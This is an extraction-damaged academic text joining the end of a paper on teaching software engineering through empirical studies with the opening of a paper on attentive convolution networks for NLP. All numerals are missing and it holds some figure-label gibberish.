lecture . exercise . relation to practice . table summarized evaluation of the one-minute-papers (winter / , tum). informal ‘‘course discusses topics of interest from practical point of view.’’ ‘‘i like the practical approach of teaching.’’ ‘‘by far one of my favorite courses at all. very interactive and relaxed atmosphere. great exercises.’’ ‘‘interactive, student presentations, experiments.’’ ‘‘applicability of the course immediately in my work for other software projects.’’ did not have the chance to initially find some agreements, the projects were failures-by- design. the students immediately started to work (they had only min to develop the working software), yet, nobody came up with the idea to negotiate a communication protocol first. therefore, after the deadline, no group could show any working software. in a closing feedback session, we revealed the nature of the experiment and discussed the observations. formal evaluation in table , we present the comparison based on the formal course evaluations conducted by the faculty of informatics. although we have only one evaluated instance of this course, we use the same structure as in table to present the data. the evaluation shows this course to be on approximately the same level as the improved software process modelling course. informal evaluation besides the formal faculty-driven evaluation, we again performed two informal feedback rounds in the course. we asked the students to write a one-minute-paper (see above). since the outcomes are actually the same as already presented in table , we only present the informal comments (third question) in table . fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. example : master’s theses using a case study approach master’s theses provide opportunities for individual students to apply a specific research approach to a chosen problem. the third example comes from a selection of master’s thesis projects which we have supervised at the university of helsinki, all of which use a case study approach. they are therefore examples of both individual studies and case studies. the first thesis project investigated a software prototype game and applied usability and user experience evaluation methods to determine whether it fulfilled two sets of criteria: the entertainment value of the game, and the ability to tag photos as a side effect of playing the game. the game itself was implemented by a student team in cooperation with a company, and the thesis writer was part of the implementation team. in this thesis, the game constituted the case and four sources of evidence were used: user interviews, in-game data collection, a questionnaire, and observations from a think-aloud playing session. the thesis can be characterised as an intrinsic case study (stake, ; baxter & jack, ), since the objective was not to gain understanding of an abstract construct or general phenomenon, nor to build a theory. rather, the case itself was of interest, and the results were suitable for making further decisions regarding development of a full game based on the prototype. the second thesis project investigated continuous delivery and continuous experimentation in the b b domain. the objective was to analyse challenges, benefits, and organisational aspects in a concrete company case. the thesis writer was an employee in the company and was thus a participant observer. in this thesis, the case consisted of the development process used by two teams for two separate software products. two sources of evidence were used: participant observation and interviews with team members, six in each of the two teams. the thesis can be characterised as an exploratory deductive case study, where the aim was to explore how continuous delivery and continuous experimentation could be applied in the company and what challenges and success factors are encountered. the thesis aimed to generalise and provide results that could be adapted to other b b companies. the third thesis project investigated the state of the practice of experiment-driven software product and service development. the objective was to understand the state of the practice of continuous experimentation and to identify key challenges and success factors in adopting continuous experimentation. the thesis can be characterised as a qualitative survey design, which resembles a case study but relies on a single source of evidence. in that sense, the thesis was close to an intrinsic case study, as it aimed to develop a multifaceted understanding of the topic rather than develop theory. the thesis used material from interviews in software companies. the result of the thesis was a rich picture of the state of the art concerning experiment-driven software development in the case companies. although the primary aim was not to generalise, the results were relevant as comparison points in other companies. informal evaluation utilising a case study approach in the masters’ theses provided the opportunity to investigate highly relevant problems in their natural context. each thesis gained from fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. having an industrial connection which provided real-life constraints, questions, and data. in each thesis, the student had to consider the setting, objectives, questions, methods, data collection, and analysis procedures and adjust the general case study research method to their particular implementation. we observed high motivation among the students, timely completion of subtasks and of the thesis as a whole, and clear maturation with a complex individual project. two of the theses were developed into scientific papers that have been published in peer-reviewed forums. based on these examples, the difficulties related to case studies can be summarised into three categories. first, finding and scoping a relevant research problem can be difficult for many students, as they do not have the necessary overview of the present literature that is needed. the role of the advisor is of prime importance in the beginning: helping to formulate the research questions and pinpoint what the case or unit of analysis is. second, understanding case study research as a method can take a long time without proper guidance. providing relevant method literature, identifying the key concepts, and providing an understanding of how to implement the method in practice —designing the study—are areas where the advisor can help. the data collection is usually interesting and straightforward, perhaps with some practical challenges related to finding data sources. as these can often be overcome by some persistence, the third category is related to performing the analysis and writing up the case report or thesis. students do not often have a chance to practice these skills on a regular basis, and thus there are many questions regarding analysis choices and patterns for writing up results that an advisor may be able to help with. although we rely here only on informal evaluation, these examples have convinced us that case studies of different types are well suited as teaching tools. they require a wide range of skills which the students must acquire, and these skills are applicable in many other settings as well. perhaps the most important insight to be gained from conducting case studies is that students are faced with a wide variety of data that challenge their preconceptions and develop their ability to observe phenomena in their real-life context. discussion implementing a course using empirical instruments provided us with a number of insights. related to the scientific and organizational perspective, we learned that course preparation causes more effort compared to classic teaching. first, the examples and cases to be used in experiments need to be tailored accordingly: there must be time restrictions due to schedule requirements. this has two major impacts. first, the investigated topic is of reduced complexity, which causes it to be less realistic. second, research questions must be carefully selected for reasonable treatment within time constraints. therefore, we consider explorative (curiosity-driven) or confirmative experiments meaningful, i.e., experiments of low criticality. from the teaching perspective, we experienced that the choice of a real world example rather than an artificial toy example has proved to be successful. for example, the experiment outcome from kuhrmann, fernandez & knapp ( ) was a fully implemented process to which the process owner stated that he did not expect the student groups to create fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ‘‘such a comprehensive solution in this little time.’’ another goal—‘‘let students experience the consequences of their decisions’’—was also achieved. for instance, in the course on software process modelling, while implementing the process in a workshop session, we could observe a certain learning curve. one team had a complete design, but selected an inappropriate modelling concept. later, the team had to refactor the implementation, which was an annoying and time-consuming task, both increasing their awareness of the consequences of certain design decisions. furthermore, students also experienced how difficult it is to transform informal information or tacit knowledge into process models. the students could also see how difficult it is for individuals to formulate their behaviour in a rule-oriented manner. for the course on software process modelling in munich, we compared the final grades of both courses and recognized significantly better grades in the second run. during course exams, the students could not only answer all (theoretical) knowledge-related questions, but also all knowledge-transfer and application-related questions. the students usually referred to the practical examples and were able to transfer and apply their experiences to new situations. finally, the case study-based master’s theses allowed our students to be embedded in projects with real-life connections. apart from their educational value for the students, they contributed to the scientific literature and helped students in their early careers. although our industry connections were important in obtaining the cases, the students themselves learned to be self-directed in their work and gained significant domain knowledge. as thesis supervisors, we found that there was some additional effort in introducing case study methodology to students—methodology courses do not fully prepare students to actually carry out a study of their own, which is to be expected. however, being embedded in the project and receiving feedback from the project environment and its stakeholders meant that it was easy to convince students of the necessity of a structured approach. once students were up to speed, the extra supervision effort was compensated by more autonomous work on the students’ part. limitations the guideline presented in this paper has not been systematically tested in different learning environments. instead, it represents a starting point based on reflection grounded in teaching practice. we consider the limitations of the study in terms of qualitative criteria for validity (c.f. creswell, ). internal validity concerns the congruence between findings and reality. in this study, internal validity then concerns how credible the guidelines are in light of the realities of software engineering education. as that reality is constantly changing, the match between guidelines and teaching can never be perfect. our study has applied triangulation to increase the internal validity of the results. we have utilised several types of teaching in different modes and in different universities, and with different teachers, to obtain a richer set of experiences to draw guidelines from. external validity refers to the extent to which findings can be applied to other situations. as our aim is not theory testing, external validity in this article is about enhancing, as far fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as possible, the transferability of the results. we argue that the guideline developed herein covers a wide range of teaching and learning situations, and thus can be applied widely in graduate and undergraduate education in software engineering. we have attempted to elucidate the limitations of applying the guideline by mapping study types differently to education in academia and industry, and to different purposes, challenges, and validity concerns of interest to teachers. in addition to these limitations, we see that there are certain situations where the guideline would be unsuitable. first, when the execution of an empirical study would cause ethical problems or legal consequences for any of the involved parties; in this case, the teacher should direct the student to a different task. second, the guideline relies on the teacher to assess whether a particular student possesses the necessary prerequisite skills to carry out a particular study; the guideline is not transferable if that information is missing. third, the guideline makes certain assumptions about the learning environment, such as availability of industry partners for master’s degree projects, and the availability of certain teaching resources for other study types. when attempting to apply the guideline, teachers should consider whether the necessary resources are available. conclusion there is a lack of guidance on how to use empirical studies in software engineering education. in order to address this gap, this paper provides an overview of different types of empirical studies, their suitability for use in education, as well as challenges with respect to their execution. we analysed our own teaching and the different studies that we applied as part of it, and reported on selected studies from existing literature. rather than having students conduct pure research, we opt for including different empirical instruments into software engineering courses as means to stimulate learning. the present paper provides an initial systematisation of empirical instruments from the educational perspective. we derived a set of purposes and challenges relevant for selecting a particular study type. furthermore, we also discussed validity constraints regarding the results of course-integrated studies. based on our experiences, we assigned the different purposes, challenges, and validity constraints to the different study types, and we provided further discussion on motivation and scheduling issues. we also defined a set of further study selection criteria to provide an initial guideline that helps teachers to select and include empirical studies in their courses. we believe the guideline could be used in a wide variety of settings. we note that the guideline is limited in that it considers a limited number of study types and learning outcomes—those that they authors have experience with as teaching aids and study purposes. they may not be suitable in situations where significantly different study types or learning outcomes are called for. since, to the best of our knowledge, no comparable guidelines exist, we cordially invite teachers and researchers to discuss and improve on this proposal. in particular, future work could focus on applying the guidelines in different kinds of software engineering courses and programs, both within academic university education and in industry training. the purposes, challenges, and constraints presented here could thus be further validated, refined, and perhaps extended. another particular consideration is how to perform student assessment when using empirical studies for educational purposes, in particularly when group work is involved. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. what should be assessed, how should assessment be performed fairly when many students are involved, and how should, e.g., knowledge of empirical methods, domain knowledge, procedural knowledge, and the quality of outcomes be balanced in the assessment? we believe that the purposes and validity considerations in tables and could serve as a starting point for creating rubrics that are relevant for this type of teaching. finally, further studies are needed to test the effectiveness of courses using the proposed approaches in terms of their ability to teach. the learning outcomes of such courses should be further explored: beyond what is currently known, what do students learn by conducting empirical studies, and how do their learning outcomes differ from other approaches to software engineering education? additional information and declarations funding this work was supported by tekes, the finnish funding agency for technology and innovation, as part of the n s program of digile (finnish strategic centre for science, technology and innovation in the field of ict and digital business). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: tekes, the finnish funding agency for technology and innovation. competing interests the authors declare there are no competing interests. author contributions • fabian fagerholm, marco kuhrmann and jürgen münch conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data is included in the tables. references ahadi a, lister r, haapala h, vihavainen a. . exploring machine learning methods to automatically identify students in need of assistance. in: proceedings of the eleventh annual international conference on international computing education research, icer ’ . new york: acm, – . fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. armbrust o, ebell j, hammerschall u, münch j, thoma d. . experiences and results from tailoring and deploying a large process standard in a company. software process: improvement and practice ( ): – . ball s, emerson t, lewis j, swarthout jt. . classroom experiments. available at http://serc.carleton.edu/sp/library/experiments/index.html (accessed on january ). barrows hs, tamblyn rm. . problem-based learning: an approach to medical education. new york: springer publishing company, inc. basili v, selby r, hutchens d. . experimentation in software engineering. ieee transactions on software engineering ( ): – doi . /tse. . . basili vr, rombach hd. . the tame project: towards improvement-oriented software environments. ieee transactions on software engineering ( ): – doi . / . . baxter p, jack s. . qualitative case study methodology: study design and implemen- tation for novice researchers. qualitative report ( ): – . blank s. . the four steps to the epiphany. foster city: cafepress.com. blumenfeld pc, soloway e, marx rw, krajcik js, guzdial m, palincsar a. . motivating project-based learning: sustaining the doing, supporting the learning. educational psychologist ( – ): – doi . / . . . brügge b, krusche s, alperowitz l. . software engineering project courses with industrial clients. transactions on computing education ( ): : – : doi . / . carver j, jaccheri l, morasca s, shull f. . issues in using students in empirical studies in software engineering education. in: proceedings of the th international software metrics symposium. – . carver j, jaccheri l, morasca s, shull f. . a checklist for integrating student empirical studies with research and teaching goals. empirical software engineering ( ): – doi . /s - - - . cochran-smith m. . learning and unlearning: the education of teacher educators. teaching and teacher education ( ): – doi . /s - x( ) - . creswell j. . research design: qualitative, quantitative, and mixed methods approaches. rd edition. thousand oaks: sage publications inc. deiters c, herrmann c, hildebrandt r, knauss e, kuhrmann m, rausch a, rumpe b, schneider k. . glose-lab: teaching global software engineering. in: proceedings of th ieee international conference on global software engineering. piscataway: ieee. dewey j. . how we think: a restatement of the relation of reflective thinking to the educative process. boston: dc heath. dillon j. . a review of the research on practical work in school science. technical report. king’s college available at http://score-education.org/media/ /review_of_ research.pdf . fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://serc.carleton.edu/sp/library/experiments/index.html http://dx.doi.org/ . /tse. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - x( ) - http://score-education.org/media/ /review_of_research.pdf http://score-education.org/media/ /review_of_research.pdf http://dx.doi.org/ . /peerj-cs. easterbrook s, singer j, storey m-a, damian d. . selecting empirical methods for software engineering research. in: shull f, singer j, sjøberg d, eds. guide to advanced empirical software engineering. london: springer. eisenhardt km. . building theories from case study research. the academy of management review ( ): – . fagerholm f, guinea as, mäenpää h, münch j. . the right model for continuous experimentation. journal of systems and software : – doi . /j.jss. . . . fagerholm f, oza n, münch j. . a platform for teaching applied distributed software development: the ongoing journey of the helsinki software factory. in: rd international workshop on collaborative teaching of globally distributed software development (ctgdsd). fagerholm f, sanchez guinea a, mäenpää h, münch j. a. building blocks for continuous experimentation. in: proceedings of the st international workshop on rapid continuous software engineering. new york: acm, – . fagerholm f, sanchez guinea a, münch j, borenstein j. b. the role of mentoring and project characteristics for onboarding in open source software projects. in: th acm-ieee international symposium on software engineering and measurement (esem). frank b. . the impact of classroom experiments on the learning of economics: an empirical investigation. economic inquiry ( ): – doi . /j. - . .tb .x. fucci d, turhan b, oivo m. . on the effects of programming and testing skills on external quality and productivity in a test-driven development context. in: proceedings of the th international conference on evaluation and assessment in software engineering. new york: acm, : – : . hatton n, smith d. . reflection in teacher education: towards definition and implementation. teaching and teacher education ( ): – doi . / - x( ) -u. hayes j. . energizing software engineering education through real-world projects as experimental studies. in: th conference on software engineering education and training (cseet). hevner ar, march st, park j, ram s. . design science in information systems research. mis quarterly ( ): – . höst m. . introducing empirical software engineering methods in education. in: proceedings of the th conference on software engineering education and training (cseet). – . jones jl, jones ka. . teaching reflective practice: implementation in the teacher- education setting. the teacher educator ( ): – doi . / . . . juristo n, gómez os. . replication of software engineering experiments. in: meyer b, nordio m, eds. laser summer school – . lecture notes in computer science. vol. . berlin, heidelberg: springer, – . fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / - x( ) -u http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. juristo n, vegas s. . the role of non-exact replications in software engineering experiments. empirical software engineering ( ): – doi . /s - - - . keenan e, steele a, jia x. . simulating global software development in a course environment. in: international conference on global software engineering (icgse). piscataway: ieee. kitchenham ba, budgen d, brereton p. . evidence-based software engineering and systematic reviews. boca raton: crc press. kohavi r, deng a, frasca b, longbotham r, walker t, xu y. . trustworthy online controlled experiments: five puzzling outcomes explained. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, kdd ’ . new york: acm, – . koponen it, mäntylä t. . generative role of experiments in physics and in teaching physics: a suggestion for epistemological reconstruction. science & education ( ): – doi . /s - - - . kuhrmann m. . a practical approach to align research with master’s level courses. in: th international conference on computational science and engineering. kuhrmann m. . crafting a software process improvement approach—a retro- spective systematization. journal of software: evolution and process ( ): – doi . /smr. . kuhrmann m, femmer h, eckhardt j. . controlled experiments as means to teach soft skills in software engineering. in: yu l, ed. overcoming challenges in software engineering education: delivering non-technical knowledge and skills. hershey: igi global. kuhrmann m, fernandez dm, knapp a. . who cares about software process modeling? a first investigation about the perceived value of process engineering and process consumption. in: th international conference on product focused software development and process improvement (profes). kuhrmann m, fernández dm, münch j. . teaching software process modeling. in: th international conference on software engineering (icse). kuhrmann m, münch j. a. distributed software development with one hand tied behind the back: a course unit to experience the role of communication in gsd. in: th international conference on global software engineering workshops (icgsew). kuhrmann m, münch j. b. when teams go crazy: an environment to experience group dynamics in software project management courses. new york: acm, – . longi k, leinonen j, nygren h, salmi j, klami a, vihavainen a. . identification of programmers from typing patterns. in: proceedings of the th koli calling conference on computing education research, koli calling ’ . new york: acm, – . ludewig j, bassler t, deininger m, schneider k, schwille j. . sesam-simulating software projects. in: proceedings of the fourth international conference on software engineering and knowledge engineering, . doi . /seke. . . fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /smr. http://dx.doi.org/ . /seke. . http://dx.doi.org/ . /peerj-cs. münch j, rombach d, rus i. . creating an advanced software engineering labora- tory by combining empirical studies with process simulation. in: th international workshop on software process simulation and modeling (prosim). navarro eo, van der hoek a. . comprehensive evaluation of an educational software engineering simulation environment. in: th conference on software engineering education and training (cseet). oza n, münch j, garbajosa j, yague a, ortega eg. . identifying potential risks and benefits of using cloud in distributed software development. in: th international conference on product-focused software development and process improvement (profes). park cl. . what is the value of replicating other studies? research evaluation ( ): – doi . / . parker j. using laboratory experiments to teach introductory economics. working paper, reed college. available at http://academic.reed.edu/economics/parker/expbook .pdf (accessed on october ). rein a-d, münch j. . feature prioritization based on mock purchase: a mobile case study. in: lean enterprise software and systems conference (less). richardson i, milewski ae, mullick n. . distributed development—an education perspective on the global studio project. in: international conference on software engineering (icse). new york: acm. ries e. . the lean startup: how today’s entrepreneurs use continuous innovation to create radically successful businesses. new york: crown business. rombach d, münch j, ocampo a, humphrey ws, burton d. . teaching dis- ciplined software development. international journal of systems and software ( ): – . runeson p. . using students as experiment subjects—an analysis on graduate and freshmen student data. in: th international conference on empirical assessment in software engineering (ease). runeson p, höst m. . guidelines for conducting and reporting case study re- search in software engineering. empirical software engineering ( ): – doi . /s - - - . runeson p, höst m, rainer a, regnell b. . case study research in software engineer- ing: guidelines and examples. hoboken: john wiley & sons. schön da. . the reflective practitioner: how professionals think in action. new york: basic books. shull f, singer j, sjøberg dik. . guide to advanced empirical software engineering. london: springer. stake re. . the art of case study research. thousand oaks: sage publications, inc. staron m. . using students as subjects in experiments—a quantitative analysis of the influence of experimentation on students’ learning proces. in: th conference on software engineering education training. – . tuckman bw. . developmental sequence in small groups. psychological bulletin ( ): – doi . /h . fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://academic.reed.edu/economics/parker/expbook .pdf http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /h http://dx.doi.org/ . /peerj-cs. wohlin c, runeson p, höst m, ohlsson mc, regnell b, wesslén a. . experimenta- tion in software engineering. berlin, heidelberg: springer. wood df. . problem based learning. bmj ( ): – doi . /bmj. . . . yin r. . case study research: design and methods. th edition. thousand oaks: sage publications, inc. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bmj. . . http://dx.doi.org/ . /peerj-cs. attentive convolution: equipping cnns with rnn-style attention mechanisms wenpeng yin department of computer and information science, university of pennsylvania wenpeng@seas.upenn.edu hinrich schütze center for information and language processing, lmu munich, germany inquiries@cislmu.org abstract in nlp, convolutional neural networks (cnns) have benefited less than recur- rent neural networks (rnns) from attention mechanisms. we hypothesize that this is be- cause the attention in cnns has been mainly implemented as attentive pooling (i.e., it is applied to pooling) rather than as attentive convolution (i.e., it is integrated into con- volution). convolution is the differentiator of cnns in that it can powerfully model the higher-level representation of a word by taking into account its local fixed-size con- text in the input text tx. in this work, we propose an attentive convolution network, attconv. it extends the context scope of the convolution operation, deriving higher- level features for a word not only from local context, but also from information ex- tracted from nonlocal context by the atten- tion mechanism commonly used in rnns. this nonlocal context can come (i) from parts of the input text tx that are distant or (ii) from extra (i.e., external) contexts ty. experiments on sentence modeling with zero-context (sentiment analysis), single- context (textual entailment) and multiple- context (claim verification) demonstrate the effectiveness of attconv in sentence rep- resentation learning with the incorporation of context. in particular, attentive convo- lution outperforms attentive pooling and is a strong competitor to popular attentive rnns. introduction natural language processing (nlp) has benefited greatly from the resurgence of deep neural net- works (dnns), thanks to their high performance with less need of engineered features. a dnn typ- ically is composed of a stack of non-linear trans- https://github.com/yinwenpeng/attentive_ convolution. formation layers, each generating a hidden rep- resentation for the input by projecting the output of a preceding layer into a new space. to date, building a single and static representation to ex- press an input across diverse problems is far from satisfactory. instead, it is preferable that the rep- resentation of the input vary in different applica- tion scenarios. in response, attention mechanisms (graves, ; graves et al., ) have been pro- posed to dynamically focus on parts of the in- put that are expected to be more specific to the problem. they are mostly implemented based on fine-grained alignments between two pieces of ob- jects, each emitting a dynamic soft-selection to the components of the other, so that the selected ele- ments dominate in the output hidden representa- tion. attention-based dnns have demonstrated good performance on many tasks. convolutional neural networks (cnns; lecun et al., ) and recurrent neural networks (rnns; elman, ) are two important types of dnns. most work on attention has been done for rnns. attention-based rnns typically take three types of inputs to make a decision at the current step: (i) the current input state, (ii) a representation of local context (computed unidirectionally or bidi- rectionally; rocktäschel et al. [ ]), and (iii) the attention-weighted sum of hidden states cor- responding to nonlocal context (e.g., the hidden states of the encoder in neural machine translation; bahdanau et al. [ ]). an important question, therefore, is whether cnns can benefit from such an attention mechanism as well, and how. this is our technical motivation. our second motivation is natural language un- derstanding. in generic sentence modeling without extra context (collobert et al., ; kalchbrenner et al., ; kim, ), cnns learn sentence rep- resentations by composing word representations that are conditioned on a local context window. we believe that attentive convolution is needed transactions of the association for computational linguistics, vol. , pp. – , . action editor: slav petrov. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. https://github.com/yinwenpeng/attentive_convolution https://github.com/yinwenpeng/attentive_convolution premise, modeled as context ty plant cells have structures that animal cells lack. animal cells do not have cell walls. the cell wall is not a freestanding structure. plant cells possess a cell wall, animals never. table : examples of four premises for the hypothesis tx = “a cell wall is not present in animal cells.” in scitail data set. right column (hypothesis’s label): “ ” means true, “ ” otherwise. for some natural language understanding tasks that are essentially sentence modeling within contexts. examples: textual entailment (is a hypothesis true given a premise as the single context?; dagan et al. [ ]) and claim verification (is a claim cor- rect given extracted evidence snippets from a text corpus as the context?; thorne et al. [ ]). con- sider the scitail (khot et al., ) textual en- tailment examples in table ; here, the input text tx is the hypothesis and each premise is a context text ty. and consider the illustration of claim ver- ification in figure ; here, the input text tx is the claim and ty can consist of multiple pieces of con- text. in both cases, we would like the representa- tion of tx to be context-specific. in this work, we propose attentive convolution networks, attconv, to model a sentence (i.e., tx) either in intra-context (where ty = tx) or extra- context (where ty = tx and ty can have many pieces) scenarios. in the intra-context case (sen- timent analysis, for example), attconv extends the local context window of standard cnns to cover the entire input text tx. in the extra-context case, attconv extends the local context win- dow to cover accompanying contexts ty. for a convolution operation over a window in tx such as (leftcontext, word, rightcontext), we first compare the representation of word with all hidden states in the context ty to obtain an attentive context representation attcontext, then convolution filters derive a higher-level represen- tation for word, denoted as wordnew, by integrat- ing word with three pieces of context: leftcontext, rightcontext, and attcontext. we interpret this at- tentive convolution in two perspectives. (i) for intra-context, a higher-level word representation wordnew is learned by considering the local (i.e., leftcontext and rightcontext) as well as nonlocal (i.e., attcontext) context. (ii) for extra-context, wordnew is generated to represent word, together with its cross-text alignment attcontext, in the context leftcontext and rightcontext. in other words, the deci- sion for the word is made based on the connected maybe ha oyofajrfngn ovajrnvhar yaojnbarlvjh nhjarnohg nvhyhnv  va j maybe ha oyofajrfngn ovajrnvhar yaojnbarlvjh nhjarnohg nvhyhnv  va j whatno jmof jag as ajgonah nbjunaeorg  varguoergu arg ag . arghoguerng  mao rhg aer are hn kvar enb bhebn bnjb  ye nerb hbjanrih bjrbn  areb ahofjrf marilyn monroe worked with warner brothers telemundo is an english-language television network. c c ci cn ... contexts claim classes figure : verify claims in contexts. hidden states of cross-text aligned terms, with local context. we apply attconv to three sentence mod- eling tasks with variable-size context: a large- scale yelp sentiment classification task (lin et al., ) (intra-context, i.e., no additional context), scitail textual entailment (khot et al., ) (single extra-context), and claim verification (thorne et al., ) (multiple extra-contexts). attconv outperforms competitive dnns with and without attention and achieves state-of-the-art on the three tasks. overall, we make the following contributions: • this is the first work that equips convolution filters with the attention mechanism com- monly used in rnns. • we distinguish and build flexible modules— attention source, attention focus, and atten- tion beneficiary—to greatly advance the ex- pressivity of attention mechanisms in cnns. • attconv provides a new way to broaden the originally constrained scope of filters in conventional cnns. broader and richer con- text comes from either external context (i.e., ty) or the sentence itself (i.e., tx). • attconv shows its flexibility and effec- tiveness in sentence modeling with variable- size context. related work in this section we discuss attention-related dnns in nlp, the most relevant work for our paper. . rnns with attention graves ( ) and graves et al. ( ) first in- troduced a differentiable attention mechanism that allows rnns to focus on different parts of the input. this idea has been broadly explored in rnns, shown in figure , to deal with text generation, such as neural machine translation weighted sum attentive context sentence ty sentence tx hidden states figure : a simplified illustration of attention mecha- nism in rnns. (bahdanau et al., ; luong et al., ; kim et al., ; libovický and helcl, ), response generation in social media (shang et al., ), document reconstruction (li et al., ), and document summarization (nallapati et al., ); machine comprehension (hermann et al., ; kumar et al., ; xiong et al., ; seo et al., ; wang and jiang, ; xiong et al., ; wang et al., a); and sentence relation classi- fication, such as textual entailment (cheng et al., ; rocktäschel et al., ; wang and jiang, ; wang et al., b; chen et al., b) and answer sentence selection (miao et al., ). we try to explore the rnn-style attention mech- anisms in cnns—more specifically, in convolution. . cnns with attention in nlp, there is little work on attention-based cnns. gehring et al. ( ) propose an attention- based convolutional seq-to-seq model for machine translation. both the encoder and decoder are hi- erarchical convolution layers. at the nth layer of the decoder, the output hidden state of a convolu- tion queries each of the encoder-side hidden states, then a weighted sum of all encoder hidden states is added to the decoder hidden state, and finally this updated hidden state is fed to the convolution at layer n + . their attention implementation re- lies on the existence of a multi-layer convolution structure—otherwise the weighted context from the encoder side could not play a role in the de- coder. so essentially their attention is achieved af- ter convolution. in contrast, we aim to modify the vanilla convolution, so that cnns with attentive convolution can be applied more broadly. we discuss two systems that are representative of cnns that implement the attention in pooling (i.e., the convolution is still not affected): yin et al. ( ) and dos santos et al. ( ), illus- trated in figure . specifically, these two systems work on two input sentences, each with a set of convolution convolution inter-hidden-state match column-wise compose row-wise compose sentence tx sentence ty word embedding layer hidden states layer x y x ⋅ softmax( ) y ⋅ softmax( ) representation :t x representation :t y ( × ) matching scores figure : attentive pooling, summarized from abcnn (yin et al., ) and apcnn (dos santos et al., ). hidden states generated by a convolution layer; then, each sentence will learn a weight for ev- ery hidden state by comparing this hidden state with all hidden states in the other sentence; finally, each input sentence obtains a representation by a weighted mean pooling over all its hidden states. the core component—weighted mean pooling— was referred to as “attentive pooling,” aiming to yield the sentence representation. in contrast to attentive convolution, attentive pooling does not connect directly the hidden states of cross-text aligned phrases in a fine-grained manner to the final decision making; only the matching scores contribute to the final weighting in mean pooling. this important distinction be- tween attentive convolution and attentive pooling is further discussed in section . . inspired by the attention mechanisms in rnns, we assume that it is the hidden states of aligned phrases rather than their matching scores that can better contribute to representation learning and deci- sion making. hence, our attentive convolution differs from attentive pooling in that it uses attended hidden states from extra context (i.e., ty) or broader-range context within tx to participate in the convolution. in experiments, we will show its superiority. attconv model we use bold uppercase (e.g., h) for matrices; bold lowercase (e.g., h) for vectors; bold lower- case with index (e.g., hi) for columns of h; and non-bold lowercase for scalars. ci hi hi+ sentence tx context ty attentive context attentive convolution layer n layer n+ hi- (a) light attentive convolution layer matching attentive context attentive convolution fbene(hx) fmgran(hx) fmgran(hy) layer n layer n+ source focus beneficiary sentence tx context ty (b) advanced attentive convolution layer figure : attconv models sentence tx with context ty. to start, we assume that a piece of text t (t ∈ {tx, ty}) is represented as a sequence of hidden states hi ∈ rd (i = , , . . . , |t|), forming feature map h ∈ rd×|t|, where d is the dimensionality of hidden states. each hidden state hi has its left context li and right context ri. in concrete cnn systems, contexts li and ri can cover multiple adja- cent hidden states; we set li = hi− and ri = hi+ for simplicity in the following description. we now describe light and advanced versions of attconv. recall that attconvaims to com- pute a representation for tx in a way that convolu- tion filters encode not only local context, but also attentive context over ty. . light attconv figure (a) shows the light version of attconv. it differs in two key points—(i) and (ii)—both from the basic convolution layer that models a sin- gle piece of text and from the siamese cnn that models two text pieces in parallel. (i) a match- ing function determines how relevant each hidden state in the context ty is to the current hidden state hxi in sentence t x. we then compute an average of the hidden states in the context ty, weighted by the matching scores, to get the attentive context cxi for h x i . (ii) the convolution for position i in tx integrates hidden state hxi with three sources of context: left context hxi− , right context h x i+ , and attentive context cxi . attentive context. first, a function generates a matching score ei,j between a hidden state in tx and a hidden state in ty by (i) dot product: ei,j = (hxi ) t · hyj ( ) or (ii) bilinear form: ei,j = (hxi ) t weh y j ( ) (where we ∈ rd×d), or (iii) additive projection: ei,j = (ve) t · tanh(we ·hxi + ue ·h y j ) ( ) where we, ue ∈ rd×d and ve ∈ rd. given the matching scores, the attentive context cxi for hidden state h x i is the weighted average of all hidden states in ty: cxi = ∑ j softmax(ei)j ·h y j ( ) we refer to the concatenation of attentive contexts [cx ; . . . ; c x i ; . . . ; c x |tx|] as the feature map c x ∈ rd×|t x| for tx. attentive convolution. after attentive context has been computed, a position i in the sentence tx has a hidden state hxi , the left context h x i− , the right context hxi+ , and the attentive context c x i . attentive convolution then generates the higher- level hidden state at position i: hxi,new = tanh(w · [h x i− , h x i , h x i+ , c x i ] + b) ( ) = tanh(w · [hxi− , h x i , h x i+ ]+ w ·cxi + b) ( ) where w ∈ rd× d is the concatenation of w ∈ rd× d and w ∈ rd×d, b ∈ rd. as equation ( ) shows, equation ( ) can be achieved by summing up the results of two separate and parallel convolution steps before the non-linearity. the first is still a standard convolution-without-attention over feature map hx by filter width over the window (hxi− , h x i , hxi+ ). the second is a convolution on the feature map cx (i.e., the attentive context) with filter width (i.e., over each cxi ); then we sum up the role text premise three firefighters come out of subway station hypothesis three firefighters putting out a fire inside of a subway station table : multi-granular alignments required in textual entailment. results element-wise and add a bias term and the non- linearity. this divide-then-compose strategy makes the attentive convolution easy to implement in practice, with no need to create a new feature map, as required in equation ( ), to integrate hx and cx. it is worth mentioning that w ∈ rd× d 